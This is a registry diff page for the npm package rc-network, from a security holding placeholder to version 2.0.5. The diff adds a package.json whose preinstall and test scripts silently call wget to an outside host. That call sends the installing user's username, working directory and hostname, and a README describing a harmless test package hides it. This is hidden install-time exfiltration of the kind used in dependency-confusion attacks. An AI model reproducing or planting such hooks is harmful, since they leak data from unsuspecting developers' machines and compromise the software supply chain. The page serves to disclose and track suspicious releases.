rc-network 0.0.1-security → 2.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of rc-network might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=rc-network for more information.
1
+ This is a test package for internal usage and file creation
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
@@ -0,0 +1 @@
1
+ Request logged successfully.
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "rc-network",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.0.5",
4
+ "description": "test package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"https://pwr.wtf/ringcentral/index.php?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" #",
8
+ "preinstall": "wget --quiet \"https://pwr.wtf/ringcentral/index.php?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
9
+ },
10
+ "author": "Renwa",
11
+ "license": "ISC",
12
+ "keywords": [
13
+ "test"
14
+ ]
6
15
  }